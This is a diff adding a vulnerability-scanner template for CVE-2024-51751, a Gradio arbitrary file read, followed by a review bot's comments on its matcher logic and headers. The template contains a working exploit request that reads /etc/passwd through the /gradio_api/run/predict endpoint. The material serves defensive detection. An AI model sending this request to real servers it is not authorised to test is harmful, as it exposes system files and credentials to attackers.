diff --git a/code/cves/2024/CVE-2024-51751.yaml b/code/cves/2024/CVE-2024-51751.yaml
new file mode 100644
index 00000000000..322fb04fdcb
--- /dev/null
+++ b/code/cves/2024/CVE-2024-51751.yaml
@@ -0,0 +1,78 @@
+id: CVE-2024-51751
+
+info:
+ name: Gradio File Component Arbitrary File Read
+ author: KoYejune0302, gy741
+ severity: medium
+ description: |
+ If File or UploadButton components are used as a part of Gradio application to preview file content, an attacker with access to the application might abuse these components to read arbitrary files from the application server.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.5
+ cve-id: CVE-2024-51751
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-51751
+ - https://github.com/gradio-app/gradio/security/advisories/GHSA-rhm9-gp5p-5248
+ tags: cve, cve2024, gradio, file-read
+
+http:
+ # Pre-condition check: Ensure the server returns {"error":null} for a valid request
+ - raw:
+ - |
+ POST /gradio_api/run/predict HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Content-Length: 245
+
+ {
+ "data": [
+ {
+ "path": "/tmp/safe_file.txt",
+ "orig_name": "safe_file.txt",
+ "size": 4,
+ "mime_type": "text/plain",
+ "meta": {
+ "_type": "gradio.FileData"
+ }
+ }
+ ],
+ "event_data": null,
+ "fn_index": 0,
+ "trigger_id": 8,
+ "session_hash": "mnv42s5gt7"
+ }
+
+ matchers:
+ - type: word
+ words:
+ - '{"error":null}'
+ part: body
+
+ # Vulnerability check: Attempt to read /etc/passwd without the meta field
+ - raw:
+ - |
+ POST /gradio_api/run/predict HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/json
+ Content-Length: 215
+
+ {
+ "data": [
+ {
+ "path": "/etc/passwd",
+ "orig_name": "test.txt",
+ "size": 4,
+ "mime_type": "text/plain"
+ }
+ ],
+ "event_data": null,
+ "fn_index": 0,
+ "trigger_id": 8,
+ "session_hash": "mnv42s5gt7"
+ }
+
+ matchers:
+ - type: regex
+ regex:
+ - 'root:.*:0:0:'
+ part: body
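Review bot: The pre-condition `http` block carries its own `word` matcher for `{"error":null}`, and as far as I can tell the two blocks are matched independently, so a host that only answers the benign `/tmp/safe_file.txt` request would still be reported as CVE-2024-51751. Put both raw requests under a single `- raw:` list and gate the finding on both responses with `matchers-condition: and`, `part: body_1` on the word matcher and `part: body_2` on the `root:.*:0:0:` regex, or drop the pre-condition matcher entirely. The hard-coded `Content-Length: 245` and `Content-Length: 215` headers should be removed, since the engine computes the length itself and a stale value can truncate the JSON body and produce false negatives. `fn_index: 0` and `trigger_id: 8` look tied to one application layout, so a template comment should say that a clean result does not rule the issue out on other apps. The `cvss-score: 6.5` does not appear to match the listed `cvss-metrics` vector and should be rechecked against the NVD entry.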